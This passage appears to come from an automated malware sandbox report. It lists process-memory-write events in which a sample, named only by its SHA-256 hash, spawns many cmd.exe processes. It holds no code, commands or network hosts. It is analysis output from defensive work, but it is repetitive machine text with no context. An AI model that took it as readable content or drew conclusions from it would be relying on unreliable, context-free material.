of 1804 2020 cmd.exe 479 PID 2020 wrote to memory of 1804 2020 cmd.exe 479 PID 1804 wrote to memory of 1664 1804 cmd.exe 480 PID 1804 wrote to memory of 1664 1804 cmd.exe 480 PID 1804 wrote to memory of 1664 1804 cmd.exe 480 PID 1804 wrote to memory of 1664 1804 cmd.exe 480 PID 2020 wrote to memory of 1672 2020 cmd.exe 481 PID 2020 wrote to memory of 1672 2020 cmd.exe 481 PID 2020 wrote to memory of 1672 2020 cmd.exe 481 PID 2020 wrote to memory of 1672 2020 cmd.exe 481 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 482 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 482 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 482 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 482 PID 324 wrote to memory of 1768 324 cmd.exe 484 PID 324 wrote to memory of 1768 324 cmd.exe 484 PID 324 wrote to memory of 1768 324 cmd.exe 484 PID 324 wrote to memory of 1768 324 cmd.exe 484 PID 324 wrote to memory of 872 324 cmd.exe 485 PID 324 wrote to memory of 872 324 cmd.exe 485 PID 324 wrote to memory of 872 324 cmd.exe 485 PID 324 wrote to memory of 872 324 cmd.exe 485 PID 324 wrote to memory of 1220 324 cmd.exe 486 PID 324 wrote to memory of 1220 324 cmd.exe 486 PID 324 wrote to memory of 1220 324 cmd.exe 486 PID 324 wrote to memory of 1220 324 cmd.exe 486 PID 1220 wrote to memory of 316 1220 cmd.exe 487 PID 1220 wrote to memory of 316 1220 cmd.exe 487 PID 1220 wrote to memory of 316 1220 cmd.exe 487 PID 1220 wrote to memory of 316 1220 cmd.exe 487 PID 324 wrote to memory of 912 324 cmd.exe 488 PID 324 wrote to memory of 912 324 cmd.exe 488 PID 324 wrote to memory of 912 324 cmd.exe 488 PID 324 wrote to memory of 912 324 cmd.exe 488 PID 1436 wrote to memory of 1548 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 489 PID 1436 wrote to memory of 1548 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 489 PID 1436 wrote to memory of 1548 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 489 PID 1436 wrote to memory of 1548 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 489 PID 1548 wrote to memory of 1960 1548 cmd.exe 491 PID 1548 wrote to memory of 1960 1548 cmd.exe 491 PID 1548 wrote to memory of 1960 1548 cmd.exe 491 PID 1548 wrote to memory of 1960 1548 cmd.exe 491 PID 1548 wrote to memory of 520 1548 cmd.exe 492 PID 1548 wrote to memory of 520 1548 cmd.exe 492 PID 1548 wrote to memory of 520 1548 cmd.exe 492 PID 1548 wrote to memory of 520 1548 cmd.exe 492 PID 1548 wrote to memory of 748 1548 cmd.exe 493 PID 1548 wrote to memory of 748 1548 cmd.exe 493 PID 1548 wrote to memory of 748 1548 cmd.exe 493 PID 1548 wrote to memory of 748 1548 cmd.exe 493 PID 748 wrote to memory of 1760 748 cmd.exe 494 PID 748 wrote to memory of 1760 748 cmd.exe 494 PID 748 wrote to memory of 1760 748 cmd.exe 494 PID 748 wrote to memory of 1760 748 cmd.exe 494 PID 1548 wrote to memory of 544 1548 cmd.exe 495 PID 1548 wrote to memory of 544 1548 cmd.exe 495 PID 1548 wrote to memory of 544 1548 cmd.exe 495 PID 1548 wrote to memory of 544 1548 cmd.exe 495 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 496 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 496 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 496 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 496 PID 1248 wrote to memory of 1020 1248 cmd.exe 498 PID 1248 wrote to memory of 1020 1248 cmd.exe 498 PID 1248 wrote to memory of 1020 1248 cmd.exe 498 PID 1248 wrote to memory of 1020 1248 cmd.exe 498 PID 1248 wrote to memory of 1292 1248 cmd.exe 499 PID 1248 wrote to memory of 1292 1248 cmd.exe 499 PID 1248 wrote to memory of 1292 1248 cmd.exe 499 PID 1248 wrote to memory of 1292 1248 cmd.exe 499 PID 1248 wrote to memory of 1120 1248 cmd.exe 500 PID 1248 wrote to memory of 1120 1248 cmd.exe 500 PID 1248 wrote to memory of 1120 1248 cmd.exe 500 PID 1248 wrote to memory of 1120 1248 cmd.exe 500 PID 1120 wrote to memory of 1412 1120 cmd.exe 501 PID 1120 wrote to memory of 1412 1120 cmd.exe 501 PID 1120 wrote to memory of 1412 1120 cmd.exe 501 PID 1120 wrote to memory of 1412 1120 cmd.exe 501 PID 1248 wrote to memory of 1848 1248 cmd.exe 502 PID 1248 wrote to memory of 1848 1248 cmd.exe 502 PID 1248 wrote to memory of 1848 1248 cmd.exe 502 PID 1248 wrote to memory of 1848 1248 cmd.exe 502 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 503 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 503 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 503 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 503 PID 872 wrote to memory of 1488 872 cmd.exe 505 PID 872 wrote to memory of 1488 872 cmd.exe 505 PID 872 wrote to memory of 1488 872 cmd.exe 505 PID 872 wrote to memory of 1488 872 cmd.exe 505 PID 872 wrote to memory of 788 872 cmd.exe 506 PID 872 wrote to memory of 788 872 cmd.exe 506 PID 872 wrote to memory of 788 872 cmd.exe 506 PID 872 wrote to memory of 788 872 cmd.exe 506 PID 872 wrote to memory of 944 872 cmd.exe 507 PID 872 wrote to memory of 944 872 cmd.exe 507 PID 872 wrote to memory of 944 872 cmd.exe 507 PID 872 wrote to memory of 944 872 cmd.exe 507 PID 944 wrote to memory of 292 944 cmd.exe 508 PID 944 wrote to memory of 292 944 cmd.exe 508 PID 944 wrote to memory of 292 944 cmd.exe 508 PID 944 wrote to memory of 292 944 cmd.exe 508 PID 872 wrote to memory of 1960 872 cmd.exe 509 PID 872 wrote to memory of 1960 872 cmd.exe 509 PID 872 wrote to memory of 1960 872 cmd.exe 509 PID 872 wrote to memory of 1960 872 cmd.exe 509 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 510 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 510 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 510 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 510 PID 1832 wrote to memory of 1400 1832 cmd.exe 512 PID 1832 wrote to memory of 1400 1832 cmd.exe 512 PID 1832 wrote to memory of 1400 1832 cmd.exe 512 PID 1832 wrote to memory of 1400 1832 cmd.exe 512 PID 1832 wrote to memory of 1428 1832 cmd.exe 513 PID 1832 wrote to memory of 1428 1832 cmd.exe 513 PID 1832 wrote to memory of 1428 1832 cmd.exe 513 PID 1832 wrote to memory of 1428 1832 cmd.exe 513 PID 1832 wrote to memory of 708 1832 cmd.exe 514 PID 1832 wrote to memory of 708 1832 cmd.exe 514 PID 1832 wrote to memory of 708 1832 cmd.exe 514 PID 1832 wrote to memory of 708 1832 cmd.exe 514 PID 708 wrote to memory of 1196 708 cmd.exe 515 PID 708 wrote to memory of 1196 708 cmd.exe 515 PID 708 wrote to memory of 1196 708 cmd.exe 515 PID 708 wrote to memory of 1196 708 cmd.exe 515 PID 1832 wrote to memory of 1020 1832 cmd.exe 516 PID 1832 wrote to memory of 1020 1832 cmd.exe 516 PID 1832 wrote to memory of 1020 1832 cmd.exe 516 PID 1832 wrote to memory of 1020 1832 cmd.exe 516 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 517 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 517 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 517 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 517 PID 1728 wrote to memory of 612 1728 cmd.exe 519 PID 1728 wrote to memory of 612 1728 cmd.exe 519 PID 1728 wrote to memory of 612 1728 cmd.exe 519 PID 1728 wrote to memory of 612 1728 cmd.exe 519 PID 1728 wrote to memory of 1288 1728 cmd.exe 520 PID 1728 wrote to memory of 1288 1728 cmd.exe 520 PID 1728 wrote to memory of 1288 1728 cmd.exe 520 PID 1728 wrote to memory of 1288 1728 cmd.exe 520 PID 1728 wrote to memory of 1164 1728 cmd.exe 521 PID 1728 wrote to memory of 1164 1728 cmd.exe 521 PID 1728 wrote to memory of 1164 1728 cmd.exe 521 PID 1728 wrote to memory of 1164 1728 cmd.exe 521 PID 1164 wrote to memory of 1064 1164 cmd.exe 522 PID 1164 wrote to memory of 1064 1164 cmd.exe 522 PID 1164 wrote to memory of 1064 1164 cmd.exe 522 PID 1164 wrote to memory of 1064 1164 cmd.exe 522 PID 1728 wrote to memory of 912 1728 cmd.exe 523 PID 1728 wrote to memory of 912 1728 cmd.exe 523 PID 1728 wrote to memory of 912 1728 cmd.exe 523 PID 1728 wrote to memory of 912 1728 cmd.exe 523 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 524 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 524 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 524 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 524 PID 932 wrote to memory of 520 932 cmd.exe 526 PID 932 wrote to memory of 520 932 cmd.exe 526 PID 932 wrote to memory of 520 932 cmd.exe 526 PID 932 wrote to memory of 520 932 cmd.exe 526 PID 932 wrote to memory of 1484 932 cmd.exe 527 PID 932 wrote to memory of 1484 932 cmd.exe 527 PID 932 wrote to memory of 1484 932 cmd.exe 527 PID 932 wrote to memory of 1484 932 cmd.exe 527 PID 932 wrote to memory of 1480 932 cmd.exe 528 PID 932 wrote to memory of 1480 932 cmd.exe 528 PID 932 wrote to memory of 1480 932 cmd.exe 528 PID 932 wrote to memory of 1480 932 cmd.exe 528 PID 1480 wrote to memory of 1760 1480 cmd.exe 529 PID 1480 wrote to memory of 1760 1480 cmd.exe 529 PID 1480 wrote to memory of 1760 1480 cmd.exe 529 PID 1480 wrote to memory of 1760 1480 cmd.exe 529 PID 932 wrote to memory of 1548 932 cmd.exe 530 PID 932 wrote to memory of 1548 932 cmd.exe 530 PID 932 wrote to memory of 1548 932 cmd.exe 530 PID 932 wrote to memory of 1548 932 cmd.exe 530 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 531 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 531 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 531 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 531 PID 1828 wrote to memory of 1672 1828 cmd.exe 533 PID 1828 wrote to memory of 1672 1828 cmd.exe 533 PID 1828 wrote to memory of 1672 1828 cmd.exe 533 PID 1828 wrote to memory of 1672 1828 cmd.exe 533 PID 1828 wrote to memory of 744 1828 cmd.exe 534 PID 1828 wrote to memory of 744 1828 cmd.exe 534 PID 1828 wrote to memory of 744 1828 cmd.exe 534 PID 1828 wrote to memory of 744 1828 cmd.exe 534 PID 1828 wrote to memory of 604 1828 cmd.exe 535 PID 1828 wrote to memory of 604 1828 cmd.exe 535 PID 1828 wrote to memory of 604 1828 cmd.exe 535 PID 1828 wrote to memory of 604 1828 cmd.exe 535 PID 604 wrote to memory of 1944 604 cmd.exe 536 PID 604 wrote to memory of 1944 604 cmd.exe 536 PID 604 wrote to memory of 1944 604 cmd.exe 536 PID 604 wrote to memory of 1944 604 cmd.exe 536 PID 1828 wrote to memory of 1248 1828 cmd.exe 537 PID 1828 wrote to memory of 1248 1828 cmd.exe 537 PID 1828 wrote to memory of 1248 1828 cmd.exe 537 PID 1828 wrote to memory of 1248 1828 cmd.exe 537 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 538 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 538 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 538 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 538 PID 1488 wrote to memory of 1528 1488 cmd.exe 540 PID 1488 wrote to memory of 1528 1488 cmd.exe 540 PID 1488 wrote to memory of 1528 1488 cmd.exe 540 PID 1488 wrote to memory of 1528 1488 cmd.exe 540 PID 1488 wrote to memory of 324 1488 cmd.exe 541 PID 1488 wrote to memory of 324 1488 cmd.exe 541 PID 1488 wrote to memory of 324 1488 cmd.exe 541 PID 1488 wrote to memory of 324 1488 cmd.exe 541 PID 1488 wrote to memory of 1412 1488 cmd.exe 542 PID 1488 wrote to memory of 1412 1488 cmd.exe 542 PID 1488 wrote to memory of 1412 1488 cmd.exe 542 PID 1488 wrote to memory of 1412 1488 cmd.exe 542 PID 1412 wrote to memory of 1388 1412 cmd.exe 543 PID 1412 wrote to memory of 1388 1412 cmd.exe 543 PID 1412 wrote to memory of 1388 1412 cmd.exe 543 PID 1412 wrote to memory of 1388 1412 cmd.exe 543 PID 1488 wrote to memory of 1464 1488 cmd.exe 544 PID 1488 wrote to memory of 1464 1488 cmd.exe 544 PID 1488 wrote to memory of 1464 1488 cmd.exe 544 PID 1488 wrote to memory of 1464 1488 cmd.exe 544 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 545 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 545 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 545 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 545 PID 1572 wrote to memory of 1616 1572 cmd.exe 547 PID 1572 wrote to memory of 1616 1572 cmd.exe 547 PID 1572 wrote to memory of 1616 1572 cmd.exe 547 PID 1572 wrote to memory of 1616 1572 cmd.exe 547 PID 1572 wrote to memory of 820 1572 cmd.exe 548 PID 1572 wrote to memory of 820 1572 cmd.exe 548 PID 1572 wrote to memory of 820 1572 cmd.exe 548 PID 1572 wrote to memory of 820 1572 cmd.exe 548 PID 1572 wrote to memory of 292 1572 cmd.exe 549 PID 1572 wrote to memory of 292 1572 cmd.exe 549 PID 1572 wrote to memory of 292 1572 cmd.exe 549 PID 1572 wrote to memory of 292 1572 cmd.exe 549 PID 292 wrote to memory of 1652 292 cmd.exe 550 PID 292 wrote to memory of 1652 292 cmd.exe 550 PID 292 wrote to memory of 1652 292 cmd.exe 550 PID 292 wrote to memory of 1652 292 cmd.exe 550 PID 1572 wrote to memory of 1832 1572 cmd.exe 551 PID 1572 wrote to memory of 1832 1572 cmd.exe 551 PID 1572 wrote to memory of 1832 1572 cmd.exe 551 PID 1572 wrote to memory of 1832 1572 cmd.exe 551 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 552 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 552 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 552 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 552 PID 612 wrote to memory of 1664 612 cmd.exe 554 PID 612 wrote to memory of 1664 612 cmd.exe 554 PID 612 wrote to memory of 1664 612 cmd.exe 554 PID 612 wrote to memory of 1664 612 cmd.exe 554 PID 612 wrote to memory of 1828 612 cmd.exe 555 PID 612 wrote to memory of 1828 612 cmd.exe 555 PID 612 wrote to memory of 1828 612 cmd.exe 555 PID 612 wrote to memory of 1828 612 cmd.exe 555 PID 612 wrote to memory of 1056 612 cmd.exe 556 PID 612 wrote to memory of 1056 612 cmd.exe 556 PID 612 wrote to memory of 1056 612 cmd.exe 556 PID 612 wrote to memory of 1056 612 cmd.exe 556 PID 1056 wrote to memory of 912 1056 cmd.exe 557 PID 1056 wrote to memory of 912 1056 cmd.exe 557 PID 1056 wrote to memory of 912 1056 cmd.exe 557 PID 1056 wrote to memory of 912 1056 cmd.exe 557 PID 612 wrote to memory of 1728 612 cmd.exe 558 PID 612 wrote to memory of 1728 612 cmd.exe 558 PID 612 wrote to memory of 1728 612 cmd.exe 558 PID 612 wrote to memory of 1728 612 cmd.exe 558 PID 1436 wrote to memory of 1960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 559 PID 1436 wrote to memory of 1960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 559 PID 1436 wrote to memory of 1960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 559 PID 1436 wrote to memory of 1960 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 559 PID 1960 wrote to memory of 1312 1960 cmd.exe 561 PID 1960 wrote to memory of 1312 1960 cmd.exe 561 PID 1960 wrote to memory of 1312 1960 cmd.exe 561 PID 1960 wrote to memory of 1312 1960 cmd.exe 561 PID 1960 wrote to memory of 1132 1960 cmd.exe 562 PID 1960 wrote to memory of 1132 1960 cmd.exe 562 PID 1960 wrote to memory of 1132 1960 cmd.exe 562 PID 1960 wrote to memory of 1132 1960 cmd.exe 562 PID 1960 wrote to memory of 652 1960 cmd.exe 563 PID 1960 wrote to memory of 652 1960 cmd.exe 563 PID 1960 wrote to memory of 652 1960 cmd.exe 563 PID 1960 wrote to memory of 652 1960 cmd.exe 563 PID 652 wrote to memory of 1400 652 cmd.exe 564 PID 652 wrote to memory of 1400 652 cmd.exe 564 PID 652 wrote to memory of 1400 652 cmd.exe 564 PID 652 wrote to memory of 1400 652 cmd.exe 564 PID 1960 wrote to memory of 944 1960 cmd.exe 565 PID 1960 wrote to memory of 944 1960 cmd.exe 565 PID 1960 wrote to memory of 944 1960 cmd.exe 565 PID 1960 wrote to memory of 944 1960 cmd.exe 565 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 566 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 566 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 566 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 566 PID 1672 wrote to memory of 432 1672 cmd.exe 568 PID 1672 wrote to memory of 432 1672 cmd.exe 568 PID 1672 wrote to memory of 432 1672 cmd.exe 568 PID 1672 wrote to memory of 432 1672 cmd.exe 568 PID 1672 wrote to memory of 996 1672 cmd.exe 569 PID 1672 wrote to memory of 996 1672 cmd.exe 569 PID 1672 wrote to memory of 996 1672 cmd.exe 569 PID 1672 wrote to memory of 996 1672 cmd.exe 569 PID 1672 wrote to memory of 1480 1672 cmd.exe 570 PID 1672 wrote to memory of 1480 1672 cmd.exe 570 PID 1672 wrote to memory of 1480 1672 cmd.exe 570 PID 1672 wrote to memory of 1480 1672 cmd.exe 570 PID 1480 wrote to memory of 604 1480 cmd.exe 571 PID 1480 wrote to memory of 604 1480 cmd.exe 571 PID 1480 wrote to memory of 604 1480 cmd.exe 571 PID 1480 wrote to memory of 604 1480 cmd.exe 571 PID 1672 wrote to memory of 1880 1672 cmd.exe 572 PID 1672 wrote to memory of 1880 1672 cmd.exe 572 PID 1672 wrote to memory of 1880 1672 cmd.exe 572 PID 1672 wrote to memory of 1880 1672 cmd.exe 572 PID 1436 wrote to memory of 1528 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 573 PID 1436 wrote to memory of 1528 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 573 PID 1436 wrote to memory of 1528 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 573 PID 1436 wrote to memory of 1528 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 573 PID 1528 wrote to memory of 1444 1528 cmd.exe 575 PID 1528 wrote to memory of 1444 1528 cmd.exe 575 PID 1528 wrote to memory of 1444 1528 cmd.exe 575 PID 1528 wrote to memory of 1444 1528 cmd.exe 575 PID 1528 wrote to memory of 1608 1528 cmd.exe 576 PID 1528 wrote to memory of 1608 1528 cmd.exe 576 PID 1528 wrote to memory of 1608 1528 cmd.exe 576 PID 1528 wrote to memory of 1608 1528 cmd.exe 576 PID 1528 wrote to memory of 1288 1528 cmd.exe 577 PID 1528 wrote to memory of 1288 1528 cmd.exe 577 PID 1528 wrote to memory of 1288 1528 cmd.exe 577 PID 1528 wrote to memory of 1288 1528 cmd.exe 577 PID 1288 wrote to memory of 520 1288 cmd.exe 578 PID 1288 wrote to memory of 520 1288 cmd.exe 578 PID 1288 wrote to memory of 520 1288 cmd.exe 578 PID 1288 wrote to memory of 520 1288 cmd.exe 578 PID 1528 wrote to memory of 1220 1528 cmd.exe 579 PID 1528 wrote to memory of 1220 1528 cmd.exe 579 PID 1528 wrote to memory of 1220 1528 cmd.exe 579 PID 1528 wrote to memory of 1220 1528 cmd.exe 579 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 580 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 580 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 580 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 580 PID 1948 wrote to memory of 708 1948 cmd.exe 582 PID 1948 wrote to memory of 708 1948 cmd.exe 582 PID 1948 wrote to memory of 708 1948 cmd.exe 582 PID 1948 wrote to memory of 708 1948 cmd.exe 582 PID 1948 wrote to memory of 1628 1948 cmd.exe 583 PID 1948 wrote to memory of 1628 1948 cmd.exe 583 PID 1948 wrote to memory of 1628 1948 cmd.exe 583 PID 1948 wrote to memory of 1628 1948 cmd.exe 583 PID 1948 wrote to memory of 1412 1948 cmd.exe 584 PID 1948 wrote to memory of 1412 1948 cmd.exe 584 PID 1948 wrote to memory of 1412 1948 cmd.exe 584 PID 1948 wrote to memory of 1412 1948 cmd.exe 584 PID 1412 wrote to memory of 1196 1412 cmd.exe 585 PID 1412 wrote to memory of 1196 1412 cmd.exe 585 PID 1412 wrote to memory of 1196 1412 cmd.exe 585 PID 1412 wrote to memory of 1196 1412 cmd.exe 585 PID 1948 wrote to memory of 1428 1948 cmd.exe 586 PID 1948 wrote to memory of 1428 1948 cmd.exe 586 PID 1948 wrote to memory of 1428 1948 cmd.exe 586 PID 1948 wrote to memory of 1428 1948 cmd.exe 586 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 587 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 587 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 587 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 587 PID 1248 wrote to memory of 1164 1248 cmd.exe 589 PID 1248 wrote to memory of 1164 1248 cmd.exe 589 PID 1248 wrote to memory of 1164 1248 cmd.exe 589 PID 1248 wrote to memory of 1164 1248 cmd.exe 589 PID 1248 wrote to memory of 1640 1248 cmd.exe 590 PID 1248 wrote to memory of 1640 1248 cmd.exe 590 PID 1248 wrote to memory of 1640 1248 cmd.exe 590 PID 1248 wrote to memory of 1640 1248 cmd.exe 590 PID 1248 wrote to memory of 1652 1248 cmd.exe 591 PID 1248 wrote to memory of 1652 1248 cmd.exe 591 PID 1248 wrote to memory of 1652 1248 cmd.exe 591 PID 1248 wrote to memory of 1652 1248 cmd.exe 591 PID 1652 wrote to memory of 324 1652 cmd.exe 592 PID 1652 wrote to memory of 324 1652 cmd.exe 592 PID 1652 wrote to memory of 324 1652 cmd.exe 592 PID 1652 wrote to memory of 324 1652 cmd.exe 592 PID 1248 wrote to memory of 1460 1248 cmd.exe 593 PID 1248 wrote to memory of 1460 1248 cmd.exe 593 PID 1248 wrote to memory of 1460 1248 cmd.exe 593 PID 1248 wrote to memory of 1460 1248 cmd.exe 593 PID 1436 wrote to memory of 1312 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 594 PID 1436 wrote to memory of 1312 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 594 PID 1436 wrote to memory of 1312 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 594 PID 1436 wrote to memory of 1312 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 594 PID 1312 wrote to memory of 1488 1312 cmd.exe 596 PID 1312 wrote to memory of 1488 1312 cmd.exe 596 PID 1312 wrote to memory of 1488 1312 cmd.exe 596 PID 1312 wrote to memory of 1488 1312 cmd.exe 596 PID 1312 wrote to memory of 1056 1312 cmd.exe 597 PID 1312 wrote to memory of 1056 1312 cmd.exe 597 PID 1312 wrote to memory of 1056 1312 cmd.exe 597 PID 1312 wrote to memory of 1056 1312 cmd.exe 597 PID 1312 wrote to memory of 1972 1312 cmd.exe 598 PID 1312 wrote to memory of 1972 1312 cmd.exe 598 PID 1312 wrote to memory of 1972 1312 cmd.exe 598 PID 1312 wrote to memory of 1972 1312 cmd.exe 598 PID 1972 wrote to memory of 944 1972 cmd.exe 599 PID 1972 wrote to memory of 944 1972 cmd.exe 599 PID 1972 wrote to memory of 944 1972 cmd.exe 599 PID 1972 wrote to memory of 944 1972 cmd.exe 599 PID 1312 wrote to memory of 1960 1312 cmd.exe 600 PID 1312 wrote to memory of 1960 1312 cmd.exe 600 PID 1312 wrote to memory of 1960 1312 cmd.exe 600 PID 1312 wrote to memory of 1960 1312 cmd.exe 600 PID 1436 wrote to memory of 744 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 601 PID 1436 wrote to memory of 744 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 601 PID 1436 wrote to memory of 744 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 601 PID 1436 wrote to memory of 744 1436 